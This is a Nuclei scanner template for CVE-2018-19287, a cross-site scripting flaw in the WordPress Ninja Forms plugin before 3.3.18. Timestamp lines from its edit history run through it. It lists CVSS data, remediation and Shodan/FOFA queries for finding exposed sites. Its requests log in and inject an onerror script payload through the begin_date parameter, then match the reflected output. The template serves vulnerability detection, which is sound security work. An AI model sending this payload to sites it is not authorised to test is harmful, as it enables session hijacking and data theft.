2022-10-13 10:28:46 +00:00
id : CVE-2018-19287
info :
2022-10-19 21:11:27 +00:00
name : WordPress Ninja Forms <3.3.18 - Cross-Site Scripting
2022-10-13 10:28:46 +00:00
author : theamanrawat
severity : medium
2022-10-13 18:21:30 +00:00
description : |
2022-10-19 21:11:27 +00:00
WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade to the latest version of the Ninja Forms plugin (3.3.18 or higher) to mitigate this vulnerability.
2022-10-13 10:28:46 +00:00
reference :
2022-10-13 18:21:30 +00:00
- https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7
2022-10-13 10:28:46 +00:00
- https://wordpress.org/plugins/ninja-forms/
- https://www.exploit-db.com/exploits/45880
- https://nvd.nist.gov/vuln/detail/CVE-2018-19287
2023-07-11 19:49:27 +00:00
- https://plugins.trac.wordpress.org/changeset/1974335/ninja-forms/trunk/includes/Admin/Menus/Submissions.php
2022-10-13 10:28:46 +00:00
classification :
2022-10-14 12:26:58 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-10-13 10:28:46 +00:00
cve-id : CVE-2018-19287
2022-10-14 12:26:58 +00:00
cwe-id : CWE-79
2024-05-31 19:23:20 +00:00
epss-score : 0.36152
epss-percentile : 0.97155
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:*
2022-10-13 10:28:46 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:57:14 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : ninjaforma
product : ninja_forms
2023-09-06 12:57:14 +00:00
framework : wordpress
2024-05-31 19:23:20 +00:00
shodan-query : http.html:/wp-content/plugins/ninja-forms/
fofa-query : body=/wp-content/plugins/ninja-forms/
2024-06-07 10:04:29 +00:00
publicwww-query : /wp-content/plugins/ninja-forms/
2024-01-14 09:21:50 +00:00
tags : cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma
2022-10-13 10:28:46 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-13 10:28:46 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
2022-10-13 18:21:30 +00:00
part : body_2
2022-10-13 10:28:46 +00:00
words :
- 'Begin Date" value="\"><img src=x onerror=alert(document.domain);//">'
2022-10-13 18:21:30 +00:00
- type : word
part : header_2
words :
- text/html
2022-10-13 10:38:20 +00:00
- type : status
2022-10-13 10:28:46 +00:00
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022100d51eff5c4659c4fd0d5106f31182c5ebc798e84bbb4572f10adf0f01d61771ca02200a2522b02dbb45f65e4f8ebbb3d857d0a98c3b467de192bb0a256222a13a3a10:922c64590222798bb761d5b6d8e72950